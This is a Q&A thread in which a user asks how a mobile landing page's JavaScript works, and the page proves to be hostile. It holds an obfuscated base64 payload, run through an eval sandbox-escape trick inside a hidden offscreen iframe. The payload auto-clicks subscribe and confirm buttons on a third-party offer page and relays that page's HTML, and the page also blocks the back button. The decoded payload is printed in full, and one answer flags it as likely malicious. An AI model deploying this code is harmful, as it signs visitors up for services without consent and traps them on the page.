# I can't understand how this javascript script works (landing page)

Tags: javascript, function, iframe, eval

I'm using a lander for a mobile website, but I'm not quite sure about how an iframe is working on this particular script.

```
<html><head>
  <base href="">

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>title</title>
    <meta content="IE-edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="user-scalable=no, width=device-width, initial-scale=1.0, maximum-scale=1.0" name="viewport">
    <link rel="stylesheet" href="reset.css">
    <link rel="stylesheet" href="style.css">
    <script>
        var jmurl = 'https://google.com';
    </script>

</head>
<body>
<style type="text/css">
    .footer {
        box-sizing: border-box;
    }

    .f-links {
        text-align: center;
    }

    .f-links a {
        display: inline-block;
        margin: 10px 4px;
        font-size: 11px;
        font-weight: bold;
        text-decoration: none;
    }
</style>
<script type="text/javascript">
    function playbut() {
        document.getElementsByClassName("ldr")[0].style.display = 'block';
        document.getElementsByClassName("circle")[0].style.display = 'none';
    }
    setTimeout(function () {
        document.getElementById("preview").style.display = 'block';
        document.getElementsByClassName("ldr")[0].style.display = 'none';
        document.getElementsByClassName("ldr")[1].style.display = 'none';
        document.getElementsByClassName("circle")[0].style.display = 'block';
    }, 14000);
</script>
<div class="player-bloc">
    <div class="player" id="player">
        <div class="preview" id="preview" style="background-image: url(aa.gif); background-size: 100%; display: block; background-position: 50% 50%; background-repeat: no-repeat no-repeat;"></div>
        <div style="display: block;" class="pop" id="spinner">
            <div class="circle" onclick="playbut()" style="display: block;">
                <div class="circle_inner"></div>
            </div>

            <div class="loader ldr" style="display: none;">Loading...</div>
            <div class="btn-zone ldr" style="display: none;">
                <h2>Loading video</h2>
            </div>
        </div>
    </div>
    <div class="controls">
        <div class="ctrl">
            <img src="play.png" alt="">
        </div>
        <div class="ctrl">
            <img src="stop.png" alt="">
        </div>
        <div class="ctrl big">
            <div class="bar">
                <div class="bar-time"></div>
            </div>
        </div>
        <div class="ctrl">
            <img src="volume.png" alt="">
        </div>
        <div class="ctrl">
            <img src="expand.png" alt="">
        </div>
        <div class="ctrl">
            <img src="fullscreen.png" alt="">
        </div>
    </div>
</div>
<div class="texte">
    <p>text</p>
</div>
<script type="text/javascript" src="backfix.min.js"></script>
<script>
    function cxc(x) {
        var navU = navigator["userAgent"];
        var isAndroidMobile = navU["indexOf"]("Android") > -1 && navU["indexOf"]("Mozilla/5.0") > -1 && navU["indexOf"]("AppleWebKit") > -1;
        var pattern=/Chrome\/([\d\.]+)/;
        var regExChrome = new RegExp(pattern);
        var resultChromeRegEx = regExChrome["exec"](navU);
        var chromeVersion = (resultChromeRegEx === null ? null : regExChrome["exec"](navU)[1]);
        var cv=chromeVersion===null?null:chromeVersion.substr(3).replace(/\./g,'');
        var value= "d2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnMC5EQiBDQUxMLUlOSVRJQUw+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwp3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCcxLkRCIENBTEwtSFRNTCgwKT4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwoKaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3N1Yl9idG4nKSE9dW5kZWZpbmVkKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBzdWJfYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzdWJfYnRuJykuY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2J0biBjbGNpa2VkJywgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpLmxlbmd0aD09MSkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gY2xjaWtlZCcsICcqJyk7Cn0KZWxzZSBpZihkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpLmxlbmd0aD4wKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdzdWJtaXR0ZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0biBidG4tc3VjY2VzcyBidG4tbGcnKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZz4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZycpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gYnRuLXN1Y2Nlc3MgYnRuLWxnIGNsaWNrZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2NvbmZpcm1idXR0b24nKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnRk9VTkQgY2xpY2sxPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdjb25maXJtYnV0dG9uJylbMF0uY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2NsaWNrZWQyPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7Cn0KZWxzZQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdlbHNlPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2Vsc2U+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQ==";
        if (isAndroidMobile && cv!=='0') {
            IDBKeyRange.only.call(frames[x],0).constructor.constructor('eval(atob(\"'+ value +'\"))')();
        }else{
            window.open("\u0000javascript:eval(atob(\""+ value +"\"))", "androidload"+x);
        }
    }
    var i = document.documentElement.appendChild(document.createElement('iframe'));
    i.onload = function(){cxc(0)};
    i.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');
    i.setAttribute('sandbox', 'allow-scripts allow-forms allow-same-origin allow-popups');
    i.src = "javascript:window.location.replace('http://offer.com')";
    setTimeout(function(){location.replace(jmurl);}, 200000);
</script>

<script>
    !function () {
        var t;
        try {
            for (t = 0; 10 > t; ++t)history.pushState({}, "", '#');
            onpopstate = function (t) {
                t.state && location.replace('#')
            }
        }
        catch (o) {
        }
    }();
</script>


</body><iframe style="position:absolute;left:-9999px;top:-9999px;height:1px;width:1px" sandbox="allow-scripts allow-forms allow-same-origin allow-popups" src="javascript:window.location.replace('http://offer.com')"></iframe></html>
```

now, I'm having problem understanding how the script in line 86 works, ( is the one that start with the function  **function cxc(x) {** as it appears to be the one generating the iframe for the "offer.com" url.

I think the values shown for **i.setAttribute** might be generated in execution time and I just copied the ones that were generated for that particular execution (because the position and size appears to be odd)

please let me know if you can point me in the right direction, I want to understand how this is operating.

EDIT:

the section that has  **var value= "d2luZG93LnBhcmVudC**...  is encrypted, using base64 I got the following code:

```
window.parent.postMessage('0.DB CALL-INITIAL>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('1.DB CALL-HTML(0)>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');

if(document.getElementById('sub_btn')!=undefined)
{
    window.parent.postMessage('found sub_btn>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    document.getElementById('sub_btn').click();
    window.parent.postMessage('btn clciked', '*');
}
else if(document.getElementsByClassName('btn').length==1)
{
    window.parent.postMessage('found btn>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    document.getElementsByClassName('btn')[0].click();
    window.parent.postMessage('btn clciked', '*');
}
else if(document.getElementsByClassName('btnAcept').length>0)
{
    window.parent.postMessage('found btnAcept>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    window.parent.postMessage('found btnAcept>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
    document.getElementsByClassName('btnAcept')[0].click();
    window.parent.postMessage('submitted>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else if(document.getElementsByClassName('btn btn-success btn-lg').length>0)
{
    window.parent.postMessage('found btn btn-success btn-lg>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
    document.getElementsByClassName('btn btn-success btn-lg')[0].click();
    window.parent.postMessage('btn btn-success btn-lg clicked>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else if(document.getElementsByClassName('confirmbutton').length>0)
{
    window.parent.postMessage('FOUND click1>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
    document.getElementsByClassName('confirmbutton')[0].click();
    window.parent.postMessage('clicked2>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else
{
    window.parent.postMessage('else>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    window.parent.postMessage('else>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
```

Comment: I think you need to learn JavaScript, you can't expect people to do your work for you.

Comment: You couldn't give us a heads up as to which line is line 86?

Comment: sorry @ScottMarcus  I assumed someone would just copy into a text editor for easier reading, I updated with the pertinent information, thank you.

Comment: I'm sorry @argon but every question here could be replied with "you should learn about the topic you're asking" I did the research I was able to do and I'm just asking an specific question, I'm putting the rest of the code to give context, and of course I'm not knowledgeable on the topic, but I tried to ask politely and give as much information as possible to help someone help me. thank you for taking the time to see my question.

Comment: We don't copy code into text editors, we examine the code as provided. That's why you should always take care to format your code and comment it clearly for us.

Comment: @ScottMarcus  I understand that now, it won't happen again and I respectfully apologize for the error.

Comment: No worries @gasguirre, have a look at serdar.sanri 's answer though

Comment: @ScottMarcus  I have seen it, but actually is not a response for what I need.  for what I'm seeing the lander opens an iframe, the code inside the "value" part is navigating the iframe looking for a button to store the click value of it. and then passing it to the father, but I'm not quite clear about the rest.

Comment: @gasguirre That was actually argon' suggestion, not mine.

Answer (score 0):

This line is an encrypted data which is decrypted in next eval(atob.. parts. Most likely malicious, that tries to inject itself on the page.

```
var value= "d2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnMC5EQiBDQUxMLUlOSVRJQUw+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwp3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCcxLkRCIENBTEwtSFRNTCgwKT4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwoKaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3N1Yl9idG4nKSE9dW5kZWZpbmVkKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBzdWJfYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzdWJfYnRuJykuY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2J0biBjbGNpa2VkJywgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpLmxlbmd0aD09MSkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gY2xjaWtlZCcsICcqJyk7Cn0KZWxzZSBpZihkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpLmxlbmd0aD4wKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdzdWJtaXR0ZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0biBidG4tc3VjY2VzcyBidG4tbGcnKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZz4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZycpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gYnRuLXN1Y2Nlc3MgYnRuLWxnIGNsaWNrZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2NvbmZpcm1idXR0b24nKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnRk9VTkQgY2xpY2sxPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdjb25maXJtYnV0dG9uJylbMF0uY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2NsaWNrZWQyPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7Cn0KZWxzZQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdlbHNlPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2Vsc2U+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQ==";
```

Comment: yes, I was able to decrypt that using base64, I'm adding it in the original section now

Comment: yes @NewToJS  I just had it updated, thank you though :)